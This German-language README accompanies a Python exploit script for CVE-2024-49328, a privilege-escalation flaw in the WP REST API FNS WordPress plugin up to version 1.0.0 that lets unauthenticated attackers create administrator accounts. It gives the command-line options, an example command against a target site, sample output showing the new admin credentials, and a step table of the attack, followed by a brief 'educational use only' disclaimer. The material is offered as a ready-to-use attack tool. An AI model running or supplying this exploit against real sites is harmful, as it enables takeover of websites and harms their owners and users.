
Python-Skript zum Ausnutzen einer Privilege-Escalation-Schwachstelle im WP REST API FNS WordPress-Plugin, das die nicht authentifizierte Erstellung von Administratorkonten ermöglicht.
Dieses Skript nutzt eine Privilege-Escalation-Schwachstelle im WP REST API FNS Plugin für WordPress aus. Die Schwachstelle betrifft alle Versionen bis einschließlich 1.0.0 und ermöglicht nicht authentifizierten Angreifern, Administratorrechte zu erlangen.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site
-e NEWEMAIL, --Newemail NEWEMAIL New email to register
-p PASSWORD, --password PASSWORD Password for the new user
Beispielbefehl:
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123
Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit
pip install requests
🚨 Warnung:
Dieses Skript dient nur zu Bildungszwecken. Die unbefugte Verwendung dieses Skripts gegen Systeme ohne ausdrückliche Genehmigung ist illegal und unethisch.
| Schritt | Beschreibung | Symbol |
|---|
| Schritt 1 | Überprüfe die Version des Plugins. | 📝 |
| Schritt 2 | Prüfe, ob die Version ausnutzbar ist (1.0.0 oder niedriger). | ✅ |
| Schritt 3 | Nutze die Schwachstelle aus und registriere einen neuen Admin-Benutzer. | 🔒 |
| Schritt 4 | Gib das Ergebnis mit Benutzeranmeldedaten zur Überprüfung aus. | 🎉 |